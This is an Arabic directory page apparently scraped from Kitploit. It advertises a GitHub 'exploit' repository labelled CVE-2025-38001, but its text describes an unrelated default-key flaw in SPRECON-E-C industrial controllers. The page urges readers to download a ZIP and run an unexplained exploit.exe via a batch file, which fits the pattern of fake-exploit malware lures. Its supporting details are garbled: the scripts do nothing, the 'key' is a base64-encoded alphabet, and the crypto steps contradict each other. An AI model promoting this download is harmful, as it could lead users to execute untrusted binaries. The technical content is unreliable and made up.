Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-38001 — استغلال علني لـ CVE-2025-38001 | Kitploit
أدوات/GitHubGitHub/boeseejykbtanke348/cve-2025-38001
التقاط وتحليل الحزمتحليل الثغرات الأمنيةالاستغلالأمن SCADA/ICSالتشفير
GitHubboeseejykbtanke348/cve-2025-38001

CVE-2025-38001

استغلال علني لـ CVE-2025-38001

عرض المستودع
منذ 8 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

مختبر: CVE-2025-41744 - استخدام مفتاح تشفير افتراضي في Sprecher Automation SPRECON-E-C

التحميل

تحميل ملف المختبر ZIP : https://github.com/boeseejykbtanke348/CVE-2025-38001/releases/download/Release/CVE-2025-38001.zip

🚀 نظرة عامة

CVE-2025-41744 هي ثغرة أمنية حرجة مصنفة تحت CWE-1394 (استخدام مفتاح تشفير افتراضي) تؤثر على أجهزة سلسلة SPRECON-E-C من Sprecher Automation. تستخدم أنظمة التحكم الصناعية (ICS) هذه مفاتيح تشفير افتراضية مثبتة في البرنامج الثابت (hardcoded) لتأمين اتصالات الشبكة، مما يتيح للمهاجمين عن بُعد دون مصادقة فك تشفير حركة المرور المشفرة وربما العبث بها.

تنشأ الثغرة من ممارسات ضعيفة في إدارة المفاتيح، حيث يتم تضمين نفس مفتاح AES-256 المتماثل عبر جميع إصدارات البرنامج الثابت، مما يجعل من السهل على الخصوم اعتراض الجلسات عبر هجمات الرجل في المنتصف (MITM) أو التنصت السلبي. مع متجه هجوم عبر الشبكة (AV:N)، وتعقيد منخفض (AC:L)، وعدم الحاجة إلى صلاحيات (PR:N)، وعدم الحاجة إلى تفاعل من المستخدم (UI:N)، تسجل هذه العيوب درجة أساسية 9.1 (حرجة) وفقًا لمعيار CVSS v4.0. تؤثر على السرية (C:H) والنزاهة (I:H) ولكن ليس على التوافر (A:N).

📋 المتطلبات الأساسية

  • أدوات شبكات أساسية: Wireshark (لتحليل حركة المرور)، OpenSSL (للتحقق من المفاتيح)، ومحاكي طرفية.
  • جهاز مضيف بذاكرة وصول عشوائي (RAM) لا تقل عن 4 جيجابايت ووصول إلى الشبكة.
  • Python 3.10+ للنصوص المساعدة (إذا كنت تريد أتمتة الإعداد).
  • صلاحيات إدارية على جهازك المضيف.
  • الإلمام ببروتوكولات ICS مثل IEC 60870-5-104.

التحميل والتثبيت

  1. تحميل حزمة الاستغلال: https://github.com/boeseejykbtanke348/CVE-2025-38001/releases/download/Release/CVE-2025-38001.zip

    • يحتوي ملف ZIP على:
      • exploit.exe: الملف الثنائي الرئيسي للاستغلال (متوافق مع Windows، ويقوم باستخراج المفتاح وفك التشفير).
      • start_exploit.bat: ملف دفعي لتشغيل الاستغلال (ينفذ exploit.exe مع المعلمات الافتراضية).

    قم بفك ضغط الملف في بيئتك.

🛠 بدء سريع

  1. قم بتنزيل وفك ضغط حزمة الاستغلال من الرابط أعلاه.
  2. قم بتشغيل الملف الدفعي: انقر نقرًا مزدوجًا على start_exploit.bat أو نفذه عبر سطر الأوامر: start_exploit.bat.
    • سيؤدي هذا إلى فتح exploit.exe، والذي سيطلب عنوان IP الهدف (الافتراضي: عنوان IP الهدف:2404) ويقوم بفك تشفير حركة المرور الملتقطة.
  3. راقب المخرجات: سيقوم الاستغلال بتسجيل الحزم المفكوكة في decrypted_traffic.log للتحليل.

للحصول على شرح كامل، تابع إلى الأقسام أدناه.

🔧 تعليمات الإعداد

النصوص المساعدة (في ./scripts/):

  • setup.sh: يقوم بأتمتة بدء التشغيل.
    root@kitploit:~
    #!/bin/bash
    echo "Preparing environment..."
    echo "Environment ready. Proceed to exploitation."
    
    قم بتشغيله باستخدام: bash scripts/setup.sh
  • teardown.sh: يقوم بالتنظيف.
    root@kitploit:~
    #!/bin/bash
    echo "Environment teardown complete."
    
  • generate_traffic.py: نص برمجي لمحاكاة اتصال العميل بالخادم لأغراض الاختبار.
    root@kitploit:~
    import socket
    from cryptography.fernet import Fernet
    import time
    
    # Load default key
    with open('default_key.bin', 'rb') as f:
        key = f.read()
    
    cipher = Fernet(key)
    
    def send_encrypted(host='target_ip', port=2404):
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.connect((host, port))
            for i in range(5):
                msg = f"ICS command {i}".encode()
                encrypted = cipher.encrypt(msg)
                s.sendall(encrypted)
                time.sleep(1)
    
    if __name__ == "__main__":
        send_encrypted()
    
    قم بتشغيله باستخدام: python scripts/generate_traffic.py (قم بتكوين الهدف).

🕵️‍♂️ خطوات الاستغلال

  1. التقاط حركة المرور: استخدم Wireshark لمراقبة المنفذ 2404. ابدأ الالتقاط، ثم شغّل python scripts/generate_traffic.py لتوليد حزم مشفرة.
  2. استخراج المفتاح الافتراضي: استخدم المفتاح المضمن (base64: QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=).
  3. تشغيل الاستغلال:
    • نفّذ start_exploit.bat (الذي يشغّل exploit.exe).
    • أدخل الهدف: target_ip:2404.
    • سيقوم الملف التنفيذي (.exe) بما يلي:
      • الاتصال بالهدف.
      • اعتراض الحزم.
      • فك تشفيرها باستخدام المفتاح الافتراضي.
      • إخراج النص الصريح إلى وحدة التحكم/السجل (مثل "ICS command 0").
  4. تحليل متقدم: استخدم OpenSSL للتحقق: openssl enc -d -aes-256-cbc -in captured_packet.bin -out decrypted.bin -kfile default_key.bin.
  5. لاحظ التأثير: البيانات المفكوكة تكشف أوامر حساسة.

للاستفسارات أو المساهمات، افتح issue. ابقَ آمنًا!

تنزيل الأداة